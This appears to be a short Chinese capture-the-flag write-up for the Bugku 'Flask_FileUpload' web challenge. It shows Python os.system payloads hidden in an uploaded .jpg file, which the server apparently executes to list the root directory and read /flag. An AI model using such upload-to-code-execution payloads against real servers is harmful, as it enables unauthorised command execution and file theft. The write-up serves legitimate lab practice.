Bugku-web-Flask_FileUpload

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
相关推荐
Hilaku12 小时前
为什么你的大文件断点续传,一遇到弱网就崩溃?
前端·javascript·程序员
胡哈13 小时前
React Compiler:让开发者忘掉 memo 这件事
前端·react.js
xiyueyezibile13 小时前
“自迭代” Skill 的 team-pitfalls 的演进
前端·后端·ai编程
北极星日淘13 小时前
中古货品品相评级算法实战|Java权重计分实现标准化五级品相体系
开发语言·python
hangyuekejiGEO13 小时前
临沂GEO服务企业技术选型分析
人工智能·python
林恒smileZAZ13 小时前
`Array(100).map(() => 1)` 为什么全为空?
前端·javascript
小巧的砖头13 小时前
C#会重蹈覆辙吗?系列之2:反射及元数据的性能问题
开发语言·前端·c#
KaMeidebaby13 小时前
卡梅德生物技术快报|蛋白的叠氮基修饰:实操解析:核酸模板耦合蛋白的叠氮基修饰实现靶蛋白定点共价标记
前端·人工智能·物联网·算法·百度
濮水大叔14 小时前
在大型 Vue 项目中,如何有效管理复杂的状态?“散装版” vs “套装版”
前端·vue.js·typescript
玄星啊14 小时前
可修改:代码的生存底线
前端·ai编程